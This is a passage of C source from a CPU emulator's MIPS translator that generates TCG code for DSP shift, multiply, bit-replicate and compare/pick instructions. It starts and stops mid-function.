t0; TCGv v1_t; TCGv v2_t; if (ret == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t0, v1); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (opc) { case OPC_SHLL_QB_DSP: { op2 = MASK_SHLL_QB(ctx->opcode); switch (op2) { case OPC_SHLL_QB: check_dsp(ctx); gen_helper_shll_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLLV_QB: check_dsp(ctx); gen_helper_shll_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLL_PH: check_dsp(ctx); gen_helper_shll_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLLV_PH: check_dsp(ctx); gen_helper_shll_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLL_S_PH: check_dsp(ctx); gen_helper_shll_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLLV_S_PH: check_dsp(ctx); gen_helper_shll_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLL_S_W: check_dsp(ctx); gen_helper_shll_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); break; case OPC_SHLLV_S_W: check_dsp(ctx); gen_helper_shll_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SHRL_QB: check_dsp(ctx); gen_helper_shrl_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRLV_QB: check_dsp(ctx); gen_helper_shrl_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRL_PH: check_dsp_r2(ctx); gen_helper_shrl_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRLV_PH: check_dsp_r2(ctx); gen_helper_shrl_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRA_QB: check_dsp_r2(ctx); gen_helper_shra_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRA_R_QB: check_dsp_r2(ctx); gen_helper_shra_r_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRAV_QB: check_dsp_r2(ctx); gen_helper_shra_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRAV_R_QB: check_dsp_r2(ctx); gen_helper_shra_r_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRA_PH: check_dsp(ctx); gen_helper_shra_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRA_R_PH: check_dsp(ctx); gen_helper_shra_r_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRAV_PH: check_dsp(ctx); gen_helper_shra_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRAV_R_PH: check_dsp(ctx); gen_helper_shra_r_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SHRA_R_W: check_dsp(ctx); gen_helper_shra_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v2_t); break; case OPC_SHRAV_R_W: check_dsp(ctx); gen_helper_shra_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; default: /* Invalid */ MIPS_INVAL("MASK SHLL.QB"); generate_exception_end(ctx, EXCP_RI); break; } break; } #ifdef TARGET_MIPS64 case OPC_SHLL_OB_DSP: op2 = MASK_SHLL_OB(ctx->opcode); switch (op2) { case OPC_SHLL_PW: check_dsp(ctx); gen_helper_shll_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_PW: check_dsp(ctx); gen_helper_shll_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHLL_S_PW: check_dsp(ctx); gen_helper_shll_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_S_PW: check_dsp(ctx); gen_helper_shll_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHLL_OB: check_dsp(ctx); gen_helper_shll_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_OB: check_dsp(ctx); gen_helper_shll_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHLL_QH: check_dsp(ctx); gen_helper_shll_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_QH: check_dsp(ctx); gen_helper_shll_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHLL_S_QH: check_dsp(ctx); gen_helper_shll_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); break; case OPC_SHLLV_S_QH: check_dsp(ctx); gen_helper_shll_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); break; case OPC_SHRA_OB: check_dsp_r2(ctx); gen_helper_shra_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_OB: check_dsp_r2(ctx); gen_helper_shra_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_R_OB: check_dsp_r2(ctx); gen_helper_shra_r_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_R_OB: check_dsp_r2(ctx); gen_helper_shra_r_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_PW: check_dsp(ctx); gen_helper_shra_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_PW: check_dsp(ctx); gen_helper_shra_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_R_PW: check_dsp(ctx); gen_helper_shra_r_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_R_PW: check_dsp(ctx); gen_helper_shra_r_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_QH: check_dsp(ctx); gen_helper_shra_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_QH: check_dsp(ctx); gen_helper_shra_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRA_R_QH: check_dsp(ctx); gen_helper_shra_r_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRAV_R_QH: check_dsp(ctx); gen_helper_shra_r_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRL_OB: check_dsp(ctx); gen_helper_shrl_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRLV_OB: check_dsp(ctx); gen_helper_shrl_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; case OPC_SHRL_QH: check_dsp_r2(ctx); gen_helper_shrl_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, t0); break; case OPC_SHRLV_QH: check_dsp_r2(ctx); gen_helper_shrl_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, v1_t); break; default: /* Invalid */ MIPS_INVAL("MASK SHLL.OB"); generate_exception_end(ctx, EXCP_RI); break; } break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } static void gen_mipsdsp_multiply(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int v1, int v2, int check_ret) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; TCGv v1_t; TCGv v2_t; if ((ret == 0) && (check_ret == 1)) { /* Treat as NOP. */ return; } t0 = tcg_temp_new_i32(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, ret); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (op1) { /* * OPC_MULT_G_2E, OPC_ADDUH_QB_DSP, OPC_MUL_PH_DSP have * the same mask and op1. */ case OPC_MULT_G_2E: check_dsp_r2(ctx); switch (op2) { case OPC_MUL_PH: gen_helper_mul_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MUL_S_PH: gen_helper_mul_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_S_W: gen_helper_mulq_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_RS_W: gen_helper_mulq_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; case OPC_DPA_W_PH_DSP: switch (op2) { case OPC_DPAU_H_QBL: check_dsp(ctx); gen_helper_dpau_h_qbl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAU_H_QBR: check_dsp(ctx); gen_helper_dpau_h_qbr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSU_H_QBL: check_dsp(ctx); gen_helper_dpsu_h_qbl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSU_H_QBR: check_dsp(ctx); gen_helper_dpsu_h_qbr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPA_W_PH: check_dsp_r2(ctx); gen_helper_dpa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAX_W_PH: check_dsp_r2(ctx); gen_helper_dpax_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAQ_S_W_PH: check_dsp(ctx); gen_helper_dpaq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAQX_S_W_PH: check_dsp_r2(ctx); gen_helper_dpaqx_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAQX_SA_W_PH: check_dsp_r2(ctx); gen_helper_dpaqx_sa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPS_W_PH: check_dsp_r2(ctx); gen_helper_dps_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSX_W_PH: check_dsp_r2(ctx); gen_helper_dpsx_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSQ_S_W_PH: check_dsp(ctx); gen_helper_dpsq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSQX_S_W_PH: check_dsp_r2(ctx); gen_helper_dpsqx_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSQX_SA_W_PH: check_dsp_r2(ctx); gen_helper_dpsqx_sa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULSAQ_S_W_PH: check_dsp(ctx); gen_helper_mulsaq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPAQ_SA_L_W: check_dsp(ctx); gen_helper_dpaq_sa_l_w(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_DPSQ_SA_L_W: check_dsp(ctx); gen_helper_dpsq_sa_l_w(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_PHL: check_dsp(ctx); gen_helper_maq_s_w_phl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_PHR: check_dsp(ctx); gen_helper_maq_s_w_phr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_PHL: check_dsp(ctx); gen_helper_maq_sa_w_phl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_PHR: check_dsp(ctx); gen_helper_maq_sa_w_phr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULSA_W_PH: check_dsp_r2(ctx); gen_helper_mulsa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #ifdef TARGET_MIPS64 case OPC_DPAQ_W_QH_DSP: { int ac = ret & 0x03; tcg_gen_movi_i32(tcg_ctx, t0, ac); switch (op2) { case OPC_DMADD: check_dsp(ctx); gen_helper_dmadd(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DMADDU: check_dsp(ctx); gen_helper_dmaddu(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DMSUB: check_dsp(ctx); gen_helper_dmsub(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DMSUBU: check_dsp(ctx); gen_helper_dmsubu(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPA_W_QH: check_dsp_r2(ctx); gen_helper_dpa_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPAQ_S_W_QH: check_dsp(ctx); gen_helper_dpaq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPAQ_SA_L_PW: check_dsp(ctx); gen_helper_dpaq_sa_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPAU_H_OBL: check_dsp(ctx); gen_helper_dpau_h_obl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPAU_H_OBR: check_dsp(ctx); gen_helper_dpau_h_obr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPS_W_QH: check_dsp_r2(ctx); gen_helper_dps_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPSQ_S_W_QH: check_dsp(ctx); gen_helper_dpsq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPSQ_SA_L_PW: check_dsp(ctx); gen_helper_dpsq_sa_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPSU_H_OBL: check_dsp(ctx); gen_helper_dpsu_h_obl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_DPSU_H_OBR: check_dsp(ctx); gen_helper_dpsu_h_obr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_L_PWL: check_dsp(ctx); gen_helper_maq_s_l_pwl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_L_PWR: check_dsp(ctx); gen_helper_maq_s_l_pwr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_QHLL: check_dsp(ctx); gen_helper_maq_s_w_qhll(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_QHLL: check_dsp(ctx); gen_helper_maq_sa_w_qhll(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_QHLR: check_dsp(ctx); gen_helper_maq_s_w_qhlr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_QHLR: check_dsp(ctx); gen_helper_maq_sa_w_qhlr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_QHRL: check_dsp(ctx); gen_helper_maq_s_w_qhrl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_QHRL: check_dsp(ctx); gen_helper_maq_sa_w_qhrl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_S_W_QHRR: check_dsp(ctx); gen_helper_maq_s_w_qhrr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MAQ_SA_W_QHRR: check_dsp(ctx); gen_helper_maq_sa_w_qhrr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MULSAQ_S_L_PW: check_dsp(ctx); gen_helper_mulsaq_s_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; case OPC_MULSAQ_S_W_QH: check_dsp(ctx); gen_helper_mulsaq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); break; } } break; #endif case OPC_ADDU_QB_DSP: switch (op2) { case OPC_MULEU_S_PH_QBL: check_dsp(ctx); gen_helper_muleu_s_ph_qbl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEU_S_PH_QBR: check_dsp(ctx); gen_helper_muleu_s_ph_qbr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_RS_PH: check_dsp(ctx); gen_helper_mulq_rs_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEQ_S_W_PHL: check_dsp(ctx); gen_helper_muleq_s_w_phl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEQ_S_W_PHR: check_dsp(ctx); gen_helper_muleq_s_w_phr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_S_PH: check_dsp_r2(ctx); gen_helper_mulq_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #ifdef TARGET_MIPS64 case OPC_ADDU_OB_DSP: switch (op2) { case OPC_MULEQ_S_PW_QHL: check_dsp(ctx); gen_helper_muleq_s_pw_qhl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEQ_S_PW_QHR: check_dsp(ctx); gen_helper_muleq_s_pw_qhr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEU_S_QH_OBL: check_dsp(ctx); gen_helper_muleu_s_qh_obl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULEU_S_QH_OBR: check_dsp(ctx); gen_helper_muleu_s_qh_obr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MULQ_RS_QH: check_dsp(ctx); gen_helper_mulq_rs_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #endif } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } static void gen_mipsdsp_bitinsn(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int val) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int16_t imm; TCGv t0; TCGv val_t; if (ret == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); val_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, val_t, val); switch (op1) { case OPC_ABSQ_S_PH_DSP: switch (op2) { case OPC_BITREV: check_dsp(ctx); gen_helper_bitrev(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); break; case OPC_REPL_QB: check_dsp(ctx); { target_long result; imm = (ctx->opcode >> 16) & 0xFF; result = (uint32_t)imm << 24 | (uint32_t)imm << 16 | (uint32_t)imm << 8 | (uint32_t)imm; result = (int32_t)result; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], result); } break; case OPC_REPLV_QB: check_dsp(ctx); tcg_gen_ext8u_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 8); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); break; case OPC_REPL_PH: check_dsp(ctx); { imm = (ctx->opcode >> 16) & 0x03FF; imm = (int16_t)(imm << 6) >> 6; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], \ (target_long)((int32_t)imm << 16 | \ (uint16_t)imm)); } break; case OPC_REPLV_PH: check_dsp(ctx); tcg_gen_ext16u_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); break; } break; #ifdef TARGET_MIPS64 case OPC_ABSQ_S_QH_DSP: switch (op2) { case OPC_REPL_OB: check_dsp(ctx); { target_long temp; imm = (ctx->opcode >> 16) & 0xFF; temp = ((uint64_t)imm << 8) | (uint64_t)imm; temp = (temp << 16) | temp; temp = (temp << 32) | temp; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], temp); break; } case OPC_REPL_PW: check_dsp(ctx); { target_long temp; imm = (ctx->opcode >> 16) & 0x03FF; imm = (int16_t)(imm << 6) >> 6; temp = ((target_long)imm << 32) \ | ((target_long)imm & 0xFFFFFFFF); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], temp); break; } case OPC_REPL_QH: check_dsp(ctx); { target_long temp; imm = (ctx->opcode >> 16) & 0x03FF; imm = (int16_t)(imm << 6) >> 6; temp = ((uint64_t)(uint16_t)imm << 48) | ((uint64_t)(uint16_t)imm << 32) | ((uint64_t)(uint16_t)imm << 16) | (uint64_t)(uint16_t)imm; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], temp); break; } case OPC_REPLV_OB: check_dsp(ctx); tcg_gen_ext8u_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 8); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 32); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); break; case OPC_REPLV_PW: check_dsp(ctx); tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 32); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); break; case OPC_REPLV_QH: check_dsp(ctx); tcg_gen_ext16u_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 32); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); break; } break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, val_t); } static void gen_mipsdsp_add_cmp_pick(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int v1, int v2, int check_ret) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t1; TCGv v1_t; TCGv v2_t; if ((ret == 0) && (check_ret == 1)) { /* Treat as NOP. */ return; } t1 = tcg_temp_new(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (op1) { case OPC_CMPU_EQ_QB_DSP: switch (op2) { case OPC_CMPU_EQ_QB: check_dsp(ctx); gen_helper_cmpu_eq_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPU_LT_QB: check_dsp(ctx); gen_helper_cmpu_lt_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPU_LE_QB: check_dsp(ctx); gen_helper_cmpu_le_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGU_EQ_QB: check_dsp(ctx); gen_helper_cmpgu_eq_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGU_LT_QB: check_dsp(ctx); gen_helper_cmpgu_lt_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGU_LE_QB: check_dsp(ctx); gen_helper_cmpgu_le_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGDU_EQ_QB: check_dsp_r2(ctx); gen_helper_cmpgu_eq_qb(tcg_ctx, t1, v1_t, v2_t); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], t1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, t1); break; case OPC_CMPGDU_LT_QB: check_dsp_r2(ctx); gen_helper_cmpgu_lt_qb(tcg_ctx, t1, v1_t, v2_t); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], t1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, t1); break; case OPC_CMPGDU_LE_QB: check_dsp_r2(ctx); gen_helper_cmpgu_le_qb(tcg_ctx, t1, v1_t, v2_t); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], t1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, t1); break; case OPC_CMP_EQ_PH: check_dsp(ctx); gen_helper_cmp_eq_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LT_PH: check_dsp(ctx); gen_helper_cmp_lt_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LE_PH: check_dsp(ctx); gen_helper_cmp_le_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PICK_QB: check_dsp(ctx); gen_helper_pick_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PICK_PH: check_dsp(ctx); gen_helper_pick_ph(tcg_ctx, 